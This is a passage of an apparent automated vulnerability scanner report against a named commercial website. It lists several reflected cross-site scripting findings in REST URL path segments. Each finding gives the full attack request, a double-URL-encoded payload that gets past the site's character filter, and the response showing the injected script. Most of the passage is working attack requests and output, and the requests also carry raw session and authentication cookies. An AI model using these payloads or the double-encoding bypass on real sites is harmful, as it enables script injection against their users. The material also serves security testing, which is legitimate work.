Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:59 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc8df8a";alert(1)//53c8f92fc22/medialib/labware/labware-icons/ph-supplies","E404") ;
   </script>
...[SNIP]...

1.384. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/ph-supplies [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/ph-supplies

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65896%2522%253balert%25281%2529%252f%252f53dd4c62d38 was submitted in the REST URL parameter 2. This input was echoed as 65896";alert(1)//53dd4c62d38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib65896%2522%253balert%25281%2529%252f%252f53dd4c62d38/labware/labware-icons/ph-supplies HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib65896";alert(1)//53dd4c62d38/labware/labware-icons/ph-supplies","E404") ;
   </script>
...[SNIP]...

1.385. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/ph-supplies [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/ph-supplies

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3c74%2522%253balert%25281%2529%252f%252fd8786125f12 was submitted in the REST URL parameter 3. This input was echoed as a3c74";alert(1)//d8786125f12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labwarea3c74%2522%253balert%25281%2529%252f%252fd8786125f12/labware-icons/ph-supplies HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labwarea3c74";alert(1)//d8786125f12/labware-icons/ph-supplies","E404") ;
   </script>
...[SNIP]...

1.386. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/ph-supplies [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/ph-supplies

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfa39%2522%253balert%25281%2529%252f%252fb357c675a75 was submitted in the REST URL parameter 4. This input was echoed as dfa39";alert(1)//b357c675a75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconsdfa39%2522%253balert%25281%2529%252f%252fb357c675a75/ph-supplies HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsdfa39";alert(1)//b357c675a75/ph-supplies","E404") ;
   </script>
...[SNIP]...

1.387. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/ph-supplies [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/ph-supplies

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39d82%2522%253balert%25281%2529%252f%252f1050d443b was submitted in the REST URL parameter 5. This input was echoed as 39d82";alert(1)//1050d443b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/ph-supplies39d82%2522%253balert%25281%2529%252f%252f1050d443b HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/ph-supplies39d82";alert(1)//1050d443b","E404") ;
   </script>
...[SNIP]...

1.388. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/pipettes [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/pipettes

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aab7d%2522%253balert%25281%2529%252f%252f1ec0894cb1e was submitted in the REST URL parameter 1. This input was echoed as aab7d";alert(1)//1ec0894cb1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcaab7d%2522%253balert%25281%2529%252f%252f1ec0894cb1e/medialib/labware/labware-icons/pipettes HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
